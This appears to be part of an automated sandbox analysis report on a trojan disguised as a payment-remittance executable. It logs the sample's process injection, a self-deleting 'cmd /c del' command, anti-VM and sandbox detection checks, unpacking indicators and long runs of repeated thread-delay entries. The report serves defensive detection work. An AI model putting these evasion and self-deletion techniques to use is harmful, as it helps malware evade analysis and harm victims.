Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Process created: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.log
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/1@11/4
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.302407881.0000000001390000.00000040.00000001.sdmp, raserver.exe, 00000013.00000002.477861762.000000000484F000.00000040.00000001.sdmp
Source: Binary string: RAServer.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.301852623.0000000000F59000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.302407881.0000000001390000.00000040.00000001.sdmp, raserver.exe
Source: Binary string: RAServer.pdbGCTL source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.301852623.0000000000F59000.00000004.00000020.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\HJmNUXoTNN\src\obj\Debug\SerializationHeaderReco.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe

Data Obfuscation:

.NET source code contains potential unpacker
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, ConsoleGame/Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 1.0.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.3c0000.0.unpack, ConsoleGame/Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 1.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.3c0000.0.unpack, ConsoleGame/Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.8a0000.0.unpack, ConsoleGame/Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.8a0000.1.unpack, ConsoleGame/Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_0041B822 push eax; ret
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_0041B82B push eax; ret
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_0041B88C push eax; ret
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_00418AC2 push ecx; ret
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_00415B75 push ds; ret
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_0041B7D5 push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_047AD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_0071B822 push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_0071B82B push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_0071B88C push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_00718AC2 push ecx; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_00715B75 push ds; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_0071B7D5 push eax; ret
Source: initial sample Static PE information: section name: .text entropy: 7.48050578829
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe File created: \electronic payment remittance document 09.13.21 vrf 65665011119889.exe

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\raserver.exe Process created: /c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe PID: 3176, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 0000000000708604 second address: 000000000070860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 000000000070899E second address: 00000000007089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -239859s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -239749s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -239640s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -239531s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -239422s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -239311s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -239202s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -239063s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -238953s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -238781s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -238656s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -238531s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -238422s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -238309s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -238156s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -238046s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -237921s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -237812s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -237687s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -237578s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -237469s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -237344s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -237203s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -237047s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -236921s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -236797s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -236672s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -236547s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -236422s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -236297s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -236172s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -236063s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -235906s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -235797s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -235672s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -235563s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -235407s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -235296s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -235172s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -235047s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -234906s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -234765s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -234655s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -234547s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -234437s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -234328s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -234219s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -234047s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -233922s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -233796s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 1364 Thread sleep time: -43239s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -233672s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -233546s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -233437s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -233297s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -233187s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -233078s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -232953s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -232844s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -232703s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -232594s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -232484s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340 Thread sleep time: -232375s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 908 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 1124 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6088Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239859
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239749
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239640
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239531
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239311
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239202
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239063
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238953
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238781
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238656
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238531
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238309
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238156
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238046
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237921
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237812
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237687
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237578
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237469
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237344
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237203
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236921
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236797
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236547
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236297
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236172
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236063
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235906
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235797
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235563
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235407
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235296
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235172
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234906
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234765
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234655
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234547
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234437
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234328
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234219
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233922
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233796
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233546
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233437
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233297
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233187
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233078
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232953
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232844
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232703
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232594
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232484
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232375
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Window / User API: threadDelayed 6984
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Window / User API: threadDelayed 974
          Source: C:\Windows\SysWOW64\raserver.exe | API coverage: 8.5 %
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239859
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239749
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239640
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239531
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239311
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239202
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 239063
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238953
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238781
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238656
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238531
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238422
